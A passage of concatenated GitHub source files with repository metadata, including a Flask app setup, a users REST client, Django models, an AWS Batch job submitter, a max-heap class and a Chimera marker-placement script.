    print(menumessages[0])
    input("PRESS {b}[ENTER]{c}...\n".format(b=blue, c=clear))
    subprocess.call(["clear"])
|
[
"noreply@github.com"
] |
skuldug12.noreply@github.com
|
c086bf9fd246880d4532c6f16e0c5ef23ca1cd7c
|
8e508352419ee63f304648ab6d0fc9a950ba9850
|
/app/__init__.py
|
40f24c9f1dcbca0695a3f7c921aa2dae90fd123d
|
[] |
no_license
|
varuntumbe/Mind_readers
|
7e4c861dc53667648c56dd57571b12d40b674d0b
|
44853887afeb3ddf9b14cfa56c6d8b3827ea86cd
|
refs/heads/master
| 2022-12-26T14:25:55.487500
| 2020-10-05T04:34:27
| 2020-10-05T04:34:27
| 297,246,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 979
|
py
|
from flask import Flask
from config import Config
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_admin import Admin
from flask_migrate import Migrate
from flask_security import Security,SQLAlchemyUserDatastore
from app.adminViewModels import HomeAdminView
from werkzeug import secure_filename
import os
#initializing flask app instance
app=Flask(__name__)
app.config.from_object(Config)
# Ensure the instance-relative upload directory exists before first use.
os.makedirs(os.path.join(app.instance_path, 'files'), exist_ok=True)
# os.makedirs(os.path.join(app.instance_path, 'profile_pics'), exist_ok=True)
#Bootstrap instance
Bootstrap(app)
#database instance
db=SQLAlchemy(app)
#migrate instance
# render_as_batch=True enables batch-mode ALTERs (needed e.g. for SQLite).
migrate=Migrate(app,db,render_as_batch=True)
#Admin instance
admin=Admin(app,'FlaskApp',url='/',index_view=HomeAdminView(name='Home'))
from app.models import *
#Flask-security
user_datastore = SQLAlchemyUserDatastore(db,Users,Roles)
securtiy=Security(app,user_datastore)  # NOTE(review): variable name typo ("securtiy")
from app import routes,models
|
[
"varuntumbe1@gmail.com"
] |
varuntumbe1@gmail.com
|
fd2f9e40af42009d2df03ad31acbf7115cfbdb22
|
ec0e202ba914a1d9318c449130eee74223af6c98
|
/rememerme/users/client.py
|
c79c6d6be62bb75e649fba4b1b42f040d57849c3
|
[
"Apache-2.0"
] |
permissive
|
rememerme/users-model
|
0f07c76bdbabf803fc6b8f6fe4aabcde42fe0e34
|
6b62af077ae93f073e9bb831a82ca8f011697277
|
refs/heads/master
| 2020-05-17T00:27:01.990149
| 2014-01-18T05:54:46
| 2014-01-18T05:54:46
| 15,694,812
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
import requests
from rememerme.users.models import User
class UserClientError(Exception):
    """Raised when the users service returns a non-200 response."""
    pass
def strip_trailing_slash(url):
    """Return *url* without its trailing '/', if it has one."""
    return url[:-1] if url[-1] == '/' else url
class UserClient:
    """Minimal HTTP client for the rememerme users service."""

    DEFAULT_URL = 'http://134.53.148.103'

    def __init__(self, session_id, url=DEFAULT_URL):
        """
        :param session_id: session token sent in the authorization header.
        :param url: base URL of the service; a trailing slash is removed.
        """
        self.url = strip_trailing_slash(url)
        self.session_id = session_id

    def create(self, username, password):
        """Create a new user. Not implemented yet.

        Fix: the original *returned* a NotImplementedError instance
        (followed by unreachable request code); raising is the intended
        way to signal an unimplemented operation.
        """
        raise NotImplementedError()

    def update(self, user_id, username=None, password=None, email=None):
        """Update the given fields of a user and return the updated User.

        :raises UserClientError: on any non-200 response.
        """
        payload = {}
        if username: payload['username'] = username
        if password: payload['password'] = password
        if email: payload['email'] = email
        headers = { 'HTTP_AUTHORIZATION' : self.session_id }
        r = requests.put(self.url + '/rest/v1/sessions/%s' % str(user_id), data=payload, headers=headers)
        # Fix: compare status codes with != instead of `is not`, which
        # tests object identity and is unreliable for int literals.
        if r.status_code != 200:
            raise UserClientError(r.text)
        return User.fromMap(r.json())

    def get(self, user_id):
        """Fetch a single user by id.

        Fix: the original issued requests.delete here, which would have
        destroyed the resource it was supposed to read.

        :raises UserClientError: on any non-200 response.
        """
        headers = { 'HTTP_AUTHORIZATION' : self.session_id }
        r = requests.get(self.url + '/rest/v1/sessions/%s' % str(user_id), headers=headers)
        if r.status_code != 200:
            raise UserClientError(r.text)
        return User.fromMap(r.json())
|
[
"andyoberlin@gmail.com"
] |
andyoberlin@gmail.com
|
7573036a1b58cfb47df0a19cefc1cb86c4072450
|
abf2e9ddc4c526e402588ca1074687e6386611b5
|
/ad-hoc/1708/1708.py
|
3823b08e8a6a18b42996609778b5dc993333481b
|
[] |
no_license
|
flavianogjc/uri-online-judge-python
|
199539944066a63164294b2c1af0c32a223bdffa
|
146ff723d690c25506081069648ff77dd74c3981
|
refs/heads/master
| 2022-05-14T21:29:28.687628
| 2022-05-01T17:46:34
| 2022-05-01T17:46:34
| 194,960,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 138
|
py
|
from math import ceil
if __name__ == '__main__':
    # NOTE: Python 2 only — raw_input() was renamed input() in Python 3.
    a, b = map(float, raw_input().split())
    # Smallest integer r such that r*(b - a) >= b.
    r = ceil(b / (b - a))
    print(int(r))
|
[
"flavianogjc@hotmail.com"
] |
flavianogjc@hotmail.com
|
12488c093c1b5ac0f706ce9218050aa2dd4bf6e7
|
17dce439a0fee47c783b26f8ff58f6b4b505ca09
|
/app/models.py
|
3d21b6e64bd314582a9d302282ff43b822ecc2b8
|
[] |
no_license
|
cbrincoveanu/django-example
|
c9b35129ff190da982456f132a8ff373ef71b753
|
0afc8ef5a166cdf920a2a56bc100f39a9d4af714
|
refs/heads/master
| 2022-12-06T07:41:17.726207
| 2020-08-15T18:22:19
| 2020-08-15T18:22:19
| 287,800,931
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
class Currency(models.Model):
    """A currency referenced by user assets."""
    name = models.CharField(max_length=100)
    abbreviation = models.CharField(max_length=100)
    objects = models.Manager()
    def __str__(self):
        # Rendered e.g. as "Euro (EUR)" in admin lists and dropdowns.
        return f"{self.name} ({self.abbreviation})"
class Profile(models.Model):
    """One-to-one profile record for each auth User."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=100, null=True, blank=True)
    objects = models.Manager()
    def __str__(self):
        return str(self.user)
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
    """post_save hook: create a Profile for every new User, then save it."""
    if created:
        Profile.objects.create(user=instance)
    # Runs on every User save, not only creation, so the profile stays persisted.
    instance.profile.save()
class UserAsset(models.Model):
    """Amount of a given currency held by a profile (one row per pair)."""
    profile = models.ForeignKey(Profile, on_delete=models.PROTECT, related_name='user_assets')
    currency = models.ForeignKey(Currency, on_delete=models.PROTECT)
    amount = models.DecimalField(max_digits=19, decimal_places=10)
    class Meta:
        # A profile holds at most one row per currency.
        unique_together = (("profile", "currency"),)
    def __str__(self):
        return f"{str(self.profile)} ({str(self.currency)})"
|
[
"c.brincoveanu@yahoo.com"
] |
c.brincoveanu@yahoo.com
|
5d1e42d4fcbfa344f5d00f5f5bbb49288f53b5ac
|
559995c23c13f67ee6f342389d0db81081207d87
|
/prjforinfcreditvilfw/vig/estisimurand/sall_aws_sandbox/template_onefile/esr_s1357_submit_job.py
|
9640ff2bd0dc0bdddbcce8ae8bbcf6bb9621c9c1
|
[] |
no_license
|
MacroFinanceHub/PrjForInfCreditVilFW
|
06a6c475d0c846c1578205e062acb0190bcce1c2
|
d2a863656962691f8dc13d205a82c81823040c8b
|
refs/heads/main
| 2023-07-19T05:31:15.992847
| 2021-08-30T14:44:14
| 2021-08-30T14:44:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,237
|
py
|
"""
Assume that:
1. Container on ECR has been updated to contain latest pyfan and thaijmp code
2. A task with the task name below has been submitted.
Note that for different invokations, can adjust the default command and compute
size of registered tasks.
Submit two separate tasks, representing two different regions.
"""
import logging
import pyfan.amto.json.json as support_json
import time
import boto3aws.tools.manage_aws as boto3aws
import parameters.runspecs.compute_specs as computespec
import parameters.runspecs.estimate_specs as estispec
import projectsupport.systemsupport as proj_sys_sup
logger = logging.getLogger(__name__)
FORMAT = '%(filename)s - %(funcName)s - %(lineno)d - %(asctime)s - %(levelname)s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
"""
OPTINAL PARAMETER SPECIFICATIONS
"""
esr_run = 7
it_call_options = 2
if it_call_options == 1:
it_esti_top_which_max = 5
# A1. Main folder name
save_directory_main = 'esti_tst_onefile_xN5'
# A2. subfolder name
esrbstfilesuffix = "_esr_tstN5_aws"
# C1. ITG or x, normal, or detailed
esrbxrditg = "x"
# C2. compute spec key
esrscomputespeckey = "ng_s_t"
# C3. test scale (esti spec key)
esrssttestscale = "_tinytst_"
elif it_call_options == 2:
it_esti_top_which_max = 5
save_directory_main = 'esti_tst_onefile_ITGN5'
esrbstfilesuffix = "_esr_tstN5_aws"
esrbxrditg = "_ITG"
esrscomputespeckey = "b_ng_p_d"
esrssttestscale = "_tinytst_"
# Both regions
ar_regions = ['ce', 'ne']
# ar_regions = ['ne']
# Region-specific combo_type information
# st_cta, st_ctb = 'e', '20201025x_esr_medtst'
st_cta, st_ctb = 'e', '20201025' + esrbxrditg + esrbstfilesuffix
dc_combo_type = {'ce': {'cta': st_cta, 'ctb': st_ctb,
'ctc': 'list_tKap_mlt_ce1a2'},
'ne': {'cta': st_cta, 'ctb': st_ctb,
'ctc': 'list_tKap_mlt_ne1a2'}}
# Region specific speckey
dc_moment_key = {'ce': '3', 'ne': '4'}
momset_key = '3'
dc_compute_spec_key = {1: esrscomputespeckey, 3: 'mpoly_1',
5: esrscomputespeckey, 7: esrscomputespeckey}
dc_esti_spec_key = {1: 'esti' + esrssttestscale + 'thin_1', 3: 'esti' + esrssttestscale + 'mpoly_13',
5: 'esti_mplypostsimu_1', 7: 'esti_mplypostesti_12'}
"""
OPTINAL PARAMETER SPECIFICATIONS
"""
# Start Batch
aws_batch = boto3aws.start_boto3_client('batch')
# This is a already registered task: see esr_s0_register_task.py
jobDefinitionName = 'a-1-thaijmp-runesr-x'
# task info
job_queue = 'Spot'
# common code esr_run specific
# 1. Sepckey
compute_spec_key, esti_spec_key = dc_compute_spec_key[esr_run], dc_esti_spec_key[esr_run]
dc_speckey = {'ce': '='.join([compute_spec_key, esti_spec_key, dc_moment_key['ce'], momset_key]),
'ne': '='.join([compute_spec_key, esti_spec_key, dc_moment_key['ne'], momset_key])}
# 1b. speckey ERS3
compute_spec_key_mpoly, esti_spec_key_mpoly = dc_compute_spec_key[3], dc_esti_spec_key[3]
dc_speckey_mpoly = {'ce': '='.join([compute_spec_key_mpoly, esti_spec_key_mpoly, dc_moment_key['ce'], momset_key]),
'ne': '='.join([compute_spec_key_mpoly, esti_spec_key_mpoly, dc_moment_key['ne'], momset_key])}
# 2. Container options
array_size = estispec.estimate_set(esti_spec_key)['esti_param_vec_count']
it_memory = computespec.compute_set(compute_spec_key)['memory']
it_vcpus = computespec.compute_set(compute_spec_key)['vcpus']
# run by region
dc_responses = {}
for st_regions in ar_regions:
if esr_run == 1 or esr_run == 3:
response = aws_batch.submit_job(
jobName=jobDefinitionName + '-' + st_regions + '-' + proj_sys_sup.save_suffix_time(2),
jobQueue=job_queue,
arrayProperties={'size': array_size},
jobDefinition=jobDefinitionName,
containerOverrides={"vcpus": int(it_vcpus),
"memory": int(it_memory),
"command": ["python",
"/ThaiJMP/invoke/run_esr.py",
str(esr_run),
"-s", dc_speckey[st_regions],
"-cta", dc_combo_type[st_regions]["cta"],
"-ctb", dc_combo_type[st_regions]["ctb"],
"-ctc", dc_combo_type[st_regions]["ctc"],
"-f", save_directory_main]})
elif esr_run == 5 or esr_run == 7:
response = aws_batch.submit_job(
jobName=jobDefinitionName + '-' + st_regions + '-' + proj_sys_sup.save_suffix_time(2),
jobQueue=job_queue,
arrayProperties={'size': it_esti_top_which_max},
jobDefinition=jobDefinitionName,
containerOverrides={"vcpus": int(it_vcpus),
"memory": int(it_memory),
"command": ["python",
"/ThaiJMP/invoke/run_esr.py",
str(esr_run),
"-s", dc_speckey[st_regions],
"-cta", dc_combo_type[st_regions]["cta"],
"-ctb", dc_combo_type[st_regions]["ctb"],
"-ctc", dc_combo_type[st_regions]["ctc"],
"-cte1", dc_speckey_mpoly[st_regions],
"-cte2", str(it_esti_top_which_max),
"-f", save_directory_main]})
else:
raise ValueError(f'The specified esr_run, {esr_run=} is not allowed.')
support_json.jdump(response, 'submit_job--response', logger=logger.info)
dc_responses[st_regions] = response
# Display status: poll both regions' array jobs until all children finish.
fl_start = time.time()
dc_bl_job_in_progress = {'ce': True, 'ne': True}
dc_it_wait_seconds = {'ce': 0, 'ne': 0}
while (dc_bl_job_in_progress['ce'] or dc_bl_job_in_progress['ne']):
    for st_regions in ar_regions:
        dc_json_batch_response = dc_responses[st_regions]
        # Get Job ID
        st_batch_jobID = dc_json_batch_response['jobId']
        # Print Job ID
        # print(f'{st_batch_jobID=}')
        # describe job to read the current array status summary
        dc_json_batch_describe_job_response = aws_batch.describe_jobs(jobs=[st_batch_jobID])
        # pprint.pprint(dc_json_batch_describe_job_response, width=1)
        it_array_size = dc_json_batch_describe_job_response['jobs'][0]['arrayProperties']['size']
        # Poll less often for larger array jobs.
        if it_array_size >= 1000:
            it_wait_time = 300
        elif it_array_size >= 100:
            it_wait_time = 120
        elif it_array_size >= 10:
            it_wait_time = 60
        else:
            it_wait_time = 20
        dc_status_summary = dc_json_batch_describe_job_response['jobs'][0]['arrayProperties']['statusSummary']
        if dc_status_summary:
            # A job is done when every child either SUCCEEDED or FAILED.
            it_completed = dc_status_summary['SUCCEEDED'] + dc_status_summary['FAILED']
            if it_completed < it_array_size:
                dc_bl_job_in_progress[st_regions] = True
                # sleep it_wait_time seconds before the next poll
                time.sleep(it_wait_time)
                dc_it_wait_seconds[st_regions] = round(time.time() - fl_start)
            else:
                dc_bl_job_in_progress[st_regions] = False
            print(f'{st_regions.upper()} ({dc_it_wait_seconds[st_regions]} sec): '
                  f'ArrayN={it_array_size},'
                  f'SUCCEEDED={dc_status_summary["SUCCEEDED"]}, FAILED={dc_status_summary["FAILED"]}, '
                  f'RUNNING={dc_status_summary["RUNNING"]}, PENDING={dc_status_summary["PENDING"]}, '
                  f'RUNNABLE={dc_status_summary["RUNNABLE"]}')
        else:
            dc_bl_job_in_progress[st_regions] = True
            # statusSummary is empty shortly after submission; keep waiting
            time.sleep(it_wait_time)
            dc_it_wait_seconds[st_regions] = round(time.time() - fl_start)
            print(f'{st_regions.upper()} ({dc_it_wait_seconds[st_regions]} sec): ArrayN={it_array_size}')
|
[
"wangfanbsg75@live.com"
] |
wangfanbsg75@live.com
|
93b7f21504d58d63e17f2a7e1435cb78ca6999d6
|
f445450ac693b466ca20b42f1ac82071d32dd991
|
/generated_tempdir_2019_09_15_163300/generated_part009324.py
|
cbdf2c82d8e24b917f93048ece6a2aa7d84ec418
|
[] |
no_license
|
Upabjojr/rubi_generated
|
76e43cbafe70b4e1516fb761cabd9e5257691374
|
cd35e9e51722b04fb159ada3d5811d62a423e429
|
refs/heads/master
| 2020-07-25T17:26:19.227918
| 2019-09-15T15:41:48
| 2019-09-15T15:41:48
| 208,357,412
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,298
|
py
|
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher108113(CommutativeMatcher):
    """Auto-generated commutative matcher (sympy rubi code generation).

    Accessed as a singleton via get(); do not edit by hand.
    """
    _instance = None
    patterns = {
        0: (0, Multiset({}), [
            (VariableWithCount('i3.1.2.0', 1, 1, None), Mul),
            (VariableWithCount('i3.1.2.0_1', 1, 1, S(1)), Mul)
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()
    def __init__(self):
        self.add_subject(None)
    @staticmethod
    def get():
        # Lazily construct the singleton on first use.
        if CommutativeMatcher108113._instance is None:
            CommutativeMatcher108113._instance = CommutativeMatcher108113()
        return CommutativeMatcher108113._instance
    @staticmethod
    def get_match_iter(subject):
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 108112
        # NOTE: 'return' before 'yield' deliberately makes this an *empty*
        # generator — the generated state machine has no transitions here.
        return
        yield
from collections import deque
|
[
"franz.bonazzi@gmail.com"
] |
franz.bonazzi@gmail.com
|
09e71736e5e525b379bb96c44c6a7660ed347411
|
6a4aa92c8cf0d7f87039ed76b822780bd525c9fb
|
/Home/urls.py
|
c3fd8014b4ef616799379978a1ed1f4f4ff90cbf
|
[] |
no_license
|
ulugbek1025/Search_doctor
|
8d30d6bf5a27db7d0232d7daac5f71ced050b0fe
|
dcfdb521af2dc3fe3127ced410924c297ea34aae
|
refs/heads/master
| 2023-03-22T23:37:17.025941
| 2021-03-23T08:04:17
| 2021-03-23T08:04:17
| 350,627,110
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
from django.contrib import admin
from django.urls import path,include
from Home import views
from .views import(
SpecialtiesList,
ProceduresList,
ConditionList,
)
# URL routes for the Home app: one list view per taxonomy plus a
# per-doctor detail route for each.
app_name='Home'
urlpatterns = [
    path('',views.index,name='index'),
    #Specialties
    path('specialties/',SpecialtiesList.as_view(),name='specialties'),
    path('specialties/doctor/<int:doctor_id>/',views.specialties_doctor,name='specialties_doctor'),
    #Procedures
    path('procedures/',ProceduresList.as_view(),name='procedures'),
    path('procedures/doctor/<int:doctor_id>/',views.procedures_doctor,name='procedures_doctor'),
    #Condition
    path('condition/',ConditionList.as_view(),name='condition'),
    path('condition/doctor/<int:doctor_id>/',views.condition_doctor,name='condition_doctor'),
]
|
[
"ulugbekgulomov2525@gmail.com"
] |
ulugbekgulomov2525@gmail.com
|
76f56cd082fbe1e7dcd760ec81b2e5383bba6cbe
|
03c7bed4cbc25c8468f5ccebd71d847ff694d308
|
/algoexpert/continuous_median_handler.py
|
3b174dee4174a0ff68a677a9f8c78430a0e7ef70
|
[] |
no_license
|
besenthil/Algorithms
|
faff1486c560bafbfd8f6fb7a0422d1b8b795d6e
|
5e8a49ffdc7aad1925ef0354208970d3d2cb62d2
|
refs/heads/master
| 2022-02-14T04:26:09.282976
| 2022-02-13T13:35:12
| 2022-02-13T13:35:12
| 51,376,159
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
class ContinuousMedianHandler:
    """Maintains the running median of a stream of numbers.

    insert() keeps an internal sorted list up to date; getMedian()
    returns the median of everything inserted so far (None before the
    first insert).
    """

    def __init__(self):
        self.median = None      # current median; None until first insert
        self.num_arr = []       # every inserted number, kept sorted
        self.low_index = 0      # index of the lower-middle element

    # O(n log n) time per insert (append + full re-sort), O(n) space.
    def insert(self, number):
        self.num_arr.append(number)
        self.num_arr.sort()
        count = len(self.num_arr)
        # Lower-middle index of a sorted list of `count` elements —
        # equivalent to the original's incremental bookkeeping.
        self.low_index = (count - 1) // 2
        if count % 2:
            # Odd count: the middle element is the median.
            self.median = self.num_arr[self.low_index]
        else:
            # Even count: average of the two middle elements.
            self.median = (self.num_arr[self.low_index] + self.num_arr[self.low_index + 1]) / 2

    def getMedian(self):
        return self.median
|
[
"besenthil@gmail.com"
] |
besenthil@gmail.com
|
ff3f576564a64698fd39d488aee3b2df3873b01e
|
9d8e2dd4441c50b443390f76c899ad1f46c42c0e
|
/mit_intro_algos/max_heap.py
|
13d0a325af33fa82b8c19924971ba9c0b20d5f14
|
[] |
no_license
|
vikramjit-sidhu/algorithms
|
186ec32de471386ce0fd6b469403199a5e3bbc6d
|
cace332fc8e952db76c19e200cc91ec8485ef14f
|
refs/heads/master
| 2021-01-01T16:20:52.071495
| 2015-08-03T17:42:29
| 2015-08-03T17:42:29
| 29,119,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,979
|
py
|
"""
Creates a max heap, can also use heap sort algorithm on a pre created array
Uses an array to implement array
My implementation of python heapq module
"""
class MaxHeap:
    """Array-backed max-heap with 1-based indexing (A[0] is an unused slot).

    Supports build-from-list, find/extract max, insert, key update, and a
    pruned BFS key search.
    """

    def __init__(self, ar=None):
        # Bug fix: the original default was the mutable literal ar=[None],
        # so every MaxHeap() created without an argument shared the SAME
        # backing list across instances. Use a None sentinel instead.
        if ar is None:
            ar = [None]
        self.A = ar
        if len(self.A) > 1:
            self.__create_maxheap()

    def __max_heapify(self, index):
        """Sift A[index] down until the max-heap property holds.

        Returns True if any swap occurred, False otherwise (used by
        update_key to decide whether to sift up instead).
        """
        left, right = 2*index, 2*index+1
        if left < len(self.A) and self.A[index] < self.A[left]:
            maximum = left
        else:
            maximum = index
        if right < len(self.A) and self.A[maximum] < self.A[right]:
            maximum = right
        if maximum != index:
            self.A[index], self.A[maximum] = self.A[maximum], self.A[index]
            self.__max_heapify(maximum)
            return True
        return False

    def __create_maxheap(self):
        """Heapify self.A in place (bottom-up build-heap)."""
        # If slot 0 holds a real key (caller passed a plain list), move it
        # to the end so index 0 stays the unused sentinel.
        if self.A[0]:
            self.A.append(self.A[0])
            self.A[0] = None
        start_index = int((len(self.A)-1)/2)
        for i in range(start_index, 0, -1):
            self.__max_heapify(i)

    def find_max(self):
        """Return (without removing) the largest key."""
        return self.A[1]

    def extract_max(self):
        """Remove and return the largest key."""
        last_index = len(self.A) - 1
        self.A[1], self.A[last_index] = self.A[last_index], self.A[1]
        max_key = self.A.pop()
        # Bug fix: the original called the bare name max_heapify(1), which
        # raised NameError — the sift-down is a (name-mangled) method.
        if len(self.A) > 1:
            self.__max_heapify(1)
        return max_key

    def insert_key(self, key):
        """Append key and sift it up to its correct position."""
        self.A.append(key)
        check_index = len(self.A) - 1
        parent_index = int(check_index/2)
        self.__parent_updatify(parent_index, check_index)

    def __parent_updatify(self, parent_index, check_index):
        """Sift A[check_index] up while it exceeds its parent."""
        while parent_index >= 1 and self.A[parent_index] < self.A[check_index]:
            self.A[parent_index], self.A[check_index] = self.A[check_index], self.A[parent_index]
            check_index, parent_index = parent_index, int(parent_index/2)

    def update_key(self, key, new_key):
        """Replace `key` with `new_key`, restoring the heap property."""
        key_index = self.find_key(key)
        self.A[key_index] = new_key
        # If sifting down did nothing, the new key may need to move up.
        if not self.__max_heapify(key_index):
            self.__parent_updatify(int(key_index/2), key_index)

    def find_key(self, key):
        """
        Returns index of key in array (self.A). Uses BFS.
        """
        from queue import Queue
        qu = Queue()
        qu.put(1)
        key_index = None
        while not qu.empty():
            element = qu.get_nowait()
            if self.A[element] == key:
                key_index = element
                break
            left, right = element*2, element*2+1
            # Prune subtrees whose root is smaller than the key — in a
            # max-heap no descendant can exceed its ancestor.
            if left < len(self.A) and self.A[left] >= key:
                qu.put_nowait(left)
            if right < len(self.A) and self.A[right] >= key:
                qu.put_nowait(right)
        else:
            # while/else: reached only when the queue drained without break.
            print("Key {0} not found".format(key))
        del(qu)
        return key_index
if __name__ == '__main__':
    main()  # NOTE(review): main() is not defined in this module — running the file directly raises NameError; confirm intent.
|
[
"vikram.sidhu.007@gmail.com"
] |
vikram.sidhu.007@gmail.com
|
f583736aeb98af156de12d7ff928aca9a305b7c8
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_exocyst_tags/initial_7607.py
|
f3e10cc911458956f628b86bc422c72bf2469275
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725
| 2016-11-30T16:23:16
| 2016-11-30T16:23:16
| 75,075,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,587
|
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Sec3_GFPN" not in marker_sets:
s=new_marker_set('Sec3_GFPN')
marker_sets["Sec3_GFPN"]=s
s= marker_sets["Sec3_GFPN"]
mark=s.place_marker((19, 105, 690), (0.15, 0.78, 0.66), 21.9005)
if "Sec3_GFPC" not in marker_sets:
s=new_marker_set('Sec3_GFPC')
marker_sets["Sec3_GFPC"]=s
s= marker_sets["Sec3_GFPC"]
mark=s.place_marker((215, 753, 192), (0.15, 0.78, 0.66), 31.586)
if "Sec3_Anch" not in marker_sets:
s=new_marker_set('Sec3_Anch')
marker_sets["Sec3_Anch"]=s
s= marker_sets["Sec3_Anch"]
mark=s.place_marker((122, 745, 777), (0.15, 0.58, 0.66), 26.9335)
if "Sec5_GFPN" not in marker_sets:
s=new_marker_set('Sec5_GFPN')
marker_sets["Sec5_GFPN"]=s
s= marker_sets["Sec5_GFPN"]
mark=s.place_marker((285, 668, 783), (0.38, 0.24, 0.37), 21.9005)
if "Sec5_GFPC" not in marker_sets:
s=new_marker_set('Sec5_GFPC')
marker_sets["Sec5_GFPC"]=s
s= marker_sets["Sec5_GFPC"]
mark=s.place_marker((266, 354, 710), (0.38, 0.24, 0.37), 31.586)
if "Sec6_GFPN" not in marker_sets:
s=new_marker_set('Sec6_GFPN')
marker_sets["Sec6_GFPN"]=s
s= marker_sets["Sec6_GFPN"]
mark=s.place_marker((732, 670, 594), (0.84, 0.98, 0.24), 21.9005)
if "Sec6_GFPC" not in marker_sets:
s=new_marker_set('Sec6_GFPC')
marker_sets["Sec6_GFPC"]=s
s= marker_sets["Sec6_GFPC"]
mark=s.place_marker((696, 107, 386), (0.84, 0.98, 0.24), 31.586)
if "Sec6_Anch" not in marker_sets:
s=new_marker_set('Sec6_Anch')
marker_sets["Sec6_Anch"]=s
s= marker_sets["Sec6_Anch"]
mark=s.place_marker((558, 299, 781), (0.84, 0.78, 0.24), 26.9335)
if "Sec8_GFPC" not in marker_sets:
s=new_marker_set('Sec8_GFPC')
marker_sets["Sec8_GFPC"]=s
s= marker_sets["Sec8_GFPC"]
mark=s.place_marker((428, 270, 711), (0.62, 0.67, 0.45), 31.586)
if "Sec8_Anch" not in marker_sets:
s=new_marker_set('Sec8_Anch')
marker_sets["Sec8_Anch"]=s
s= marker_sets["Sec8_Anch"]
mark=s.place_marker((877, 991, 805), (0.62, 0.47, 0.45), 26.9335)
if "Sec10_GFPN" not in marker_sets:
s=new_marker_set('Sec10_GFPN')
marker_sets["Sec10_GFPN"]=s
s= marker_sets["Sec10_GFPN"]
mark=s.place_marker((899, 576, 943), (0, 0.91, 0), 21.9005)
if "Sec10_GFPC" not in marker_sets:
s=new_marker_set('Sec10_GFPC')
marker_sets["Sec10_GFPC"]=s
s= marker_sets["Sec10_GFPC"]
mark=s.place_marker((671, 362, 423), (0, 0.91, 0), 31.586)
if "Sec10_Anch" not in marker_sets:
s=new_marker_set('Sec10_Anch')
marker_sets["Sec10_Anch"]=s
s= marker_sets["Sec10_Anch"]
mark=s.place_marker((699, 105, 883), (0, 0.71, 0), 26.9335)
if "Sec15_GFPN" not in marker_sets:
s=new_marker_set('Sec15_GFPN')
marker_sets["Sec15_GFPN"]=s
s= marker_sets["Sec15_GFPN"]
mark=s.place_marker((340, 501, 893), (0.11, 0.51, 0.86), 21.9005)
if "Sec15_GFPC" not in marker_sets:
s=new_marker_set('Sec15_GFPC')
marker_sets["Sec15_GFPC"]=s
s= marker_sets["Sec15_GFPC"]
mark=s.place_marker((964, 729, 337), (0.11, 0.51, 0.86), 31.586)
if "Sec15_Anch" not in marker_sets:
s=new_marker_set('Sec15_Anch')
marker_sets["Sec15_Anch"]=s
s= marker_sets["Sec15_Anch"]
mark=s.place_marker((486, 503, 223), (0.11, 0.31, 0.86), 26.9335)
if "Exo70_GFPN" not in marker_sets:
s=new_marker_set('Exo70_GFPN')
marker_sets["Exo70_GFPN"]=s
s= marker_sets["Exo70_GFPN"]
mark=s.place_marker((472, 868, 488), (0.89, 0.47, 0.4), 21.9005)
if "Exo70_GFPC" not in marker_sets:
s=new_marker_set('Exo70_GFPC')
marker_sets["Exo70_GFPC"]=s
s= marker_sets["Exo70_GFPC"]
mark=s.place_marker((333, 100, 187), (0.89, 0.47, 0.4), 31.586)
if "Exo70_Anch" not in marker_sets:
s=new_marker_set('Exo70_Anch')
marker_sets["Exo70_Anch"]=s
s= marker_sets["Exo70_Anch"]
mark=s.place_marker((147, 620, 939), (0.89, 0.27, 0.4), 26.9335)
if "Exo84_GFPN" not in marker_sets:
s=new_marker_set('Exo84_GFPN')
marker_sets["Exo84_GFPN"]=s
s= marker_sets["Exo84_GFPN"]
mark=s.place_marker((573, 301, 997), (0.5, 0.7, 0), 31.586)
if "Exo84_GFPC" not in marker_sets:
s=new_marker_set('Exo84_GFPC')
marker_sets["Exo84_GFPC"]=s
s= marker_sets["Exo84_GFPC"]
mark=s.place_marker((585, 771, 647), (0.5, 0.7, 0), 31.586)
if "Exo84_Anch" not in marker_sets:
s=new_marker_set('Exo84_Anch')
marker_sets["Exo84_Anch"]=s
s= marker_sets["Exo84_Anch"]
mark=s.place_marker((183, 347, 23), (0.5, 0.5, 0), 26.9335)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"batxes@gmail.com"
] |
batxes@gmail.com
|
3df1683b6df43174ed1afbeaa388ebae959d45e0
|
0f0451c1c3e379bb4bdd13af1a1f278a13885c45
|
/Tkinter/ModuloTkk.py
|
e6b7cfbc63a2f0b3245414cee23762ea899698eb
|
